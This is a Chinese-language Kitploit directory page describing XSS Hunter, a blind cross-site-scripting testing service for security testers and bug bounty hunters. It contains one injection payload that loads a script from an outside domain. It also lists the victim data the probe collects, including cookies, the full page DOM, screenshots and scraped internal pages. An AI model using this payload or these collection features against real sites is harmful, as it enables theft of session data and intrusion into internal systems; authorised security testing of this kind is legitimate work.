Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
xsshunter — XSS Hunter 服务 - XSSHunter.com 的便携版本 | Kitploit
工具/GitHubGitHub/mandatoryprogrammer/xsshunter
漏洞分析漏洞利用信息收集Web安全渗透测试
GitHubmandatoryprogrammer/xsshunter

xsshunter

XSS Hunter 服务 - XSSHunter.com 的便携版本

查看仓库
1.6k3034年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

已弃用 - 请尝试新的 Express 版本

更多信息请参见:https://github.com/mandatoryprogrammer/xsshunter-express

XSS Hunter 源代码

这是运行在 https://xsshunter.com 上的源代码的可移植版本。它旨在轻松安装在任何服务器上,供安全专业人员和漏洞赏金猎人使用,以更强大的方式测试 XSS。

如果你不想自己搭建这个软件,而只是想开始测试,请参见 https://xsshunter.com 。

要求

  • 一台运行(最好)Ubuntu 的服务器。
  • 一个 Mailgun 账户,用于发送 XSS 载荷触发邮件。
  • 一个域名,最好简短一些以减小载荷大小。这里有一个寻找两个字母域名的好网站:https://catechgory.com/。例如,我的域名是 xss.ht。
  • 一个通配符 SSL 证书,这里有一个便宜的。这是必需的,因为 XSS Hunter 通过子域名识别用户,并且所有子域名都需要启用 SSL。我们不能使用 Let's Encrypt,因为它们不支持通配符证书。我就不嘲讽 CA 的商业模式了,但请放心,这非常愚蠢,而且为你签发通配符证书对它们来说成本极低,所以找你能找到的最便宜的提供商(只要在所有浏览器中受支持即可)。

设置

请参见 https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ 了解如何在你自己的服务器上设置 XSS Hunter。

功能概述

注册后,你将创建一个特殊的短域名,例如 yoursubdomain.xss.ht,用于标识你的 XSS 漏洞并托管你的载荷。然后你可以在 XSS 测试中使用这个子域名,例如使用注入尝试 "><script src=//yoursubdomain.xss.ht></script>。XSS Hunter 会自动提供 XSS 探测并在触发时收集相关信息。

特性

  • 托管的 XSS 载荷触发:在你的 XSS Hunter 账户控制面板中管理所有 XSS 载荷。
  • 强大的 XSS 探测:每次探测在易受攻击的页面上触发时,都会收集以下信息:
    • 易受攻击页面的 URI
    • 执行来源
    • 受害者的 IP 地址
    • 页面 Referer
    • 受害者的 User Agent
    • 所有非 HTTP-Only 的 Cookie
    • 页面的完整 HTML DOM
    • 受影响页面的完整截图
    • 发起请求的 HTTP 请求(如果使用了 XSS Hunter 兼容的工具)
  • 完整页面截图:XSS Hunter 探测利用 HTML5 Canvas API 生成 XSS 载荷触发的易受攻击页面的完整截图。通过此功能,你可以窥探内部管理面板、支持工单系统、日志系统以及其他内部 Web 应用。这可以生成更强大的报告,向客户或漏洞赏金计划展示漏洞的完整影响。
  • Markup 报告生成:每个 XSS 载荷报告都包含一个预先生成的 Markdown 报告。这些生成的报告也兼容其他支持 Markdown 的平台,例如 Phabricator,便于在公司工单系统中轻松报告漏洞。
  • XSS 载荷触发邮件报告:XSS 载荷触发还会发送详细的邮件报告,可以轻松转发给相应的安全联系人,以便快速报告关键漏洞。
  • 自动载荷生成:XSS Hunter 自动生成 XSS 载荷,供你在 Web 应用程序安全测试中使用。
  • 关联注入:XSS Hunter 最强大的特性或许是能够将注入尝试与 XSS 载荷触发关联起来。通过使用 XSS Hunter 兼容的测试工具,你可以立即知道是什么导致了特定载荷的触发(即使在注入尝试后数周!)。
  • 可选 PGP 加密载荷邮件:过于偏执?提供了客户端 PGP 加密功能,可以在将注入数据发送到 XSS Hunter 服务之前,在受害者浏览器中加密所有注入数据。
  • 页面抓取:当你的 XSS 载荷触发时,你可以指定一个相对路径列表,让载荷自动检索并存储。这在发现其他漏洞(例如内部系统上的不良 crossdomain.xml 策略,正常情况下无法访问)时非常有用。
  • 次级载荷加载:在 XSS Hunter 完成收集后,你还有另一个次级载荷想要加载?XSS Hunter 提供了选项,允许你指定一个在收集完成后运行的二级 JavaScript 载荷。
  • iOS Web 应用:你也可以通过 iOS Web 应用查看你的 XSS 载荷触发。只需导航到 /app 路径,并将页面保存为 Web 应用到你的 iPhone 桌面即可。

值得注意的利用案例

  • 特斯拉内部服务工具中的盲 XSS:https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program/
  • Spotify 的 Salesforce 集成中的盲 XSS:https://mhmdiaa.github.io/blind-xss-in-spotify/
  • GoDaddy 支持面板中的盲 XSS:https://thehackerblog.com/poisoning-the-well-compromising-godaddy-customer-support-with-blind-xss/

想贡献代码?

所有代码都是由我创建的,因此(由于这个原因)可能不是最佳实践,并且绝对需要优化/清理。任何拉取请求都欢迎!

下载工具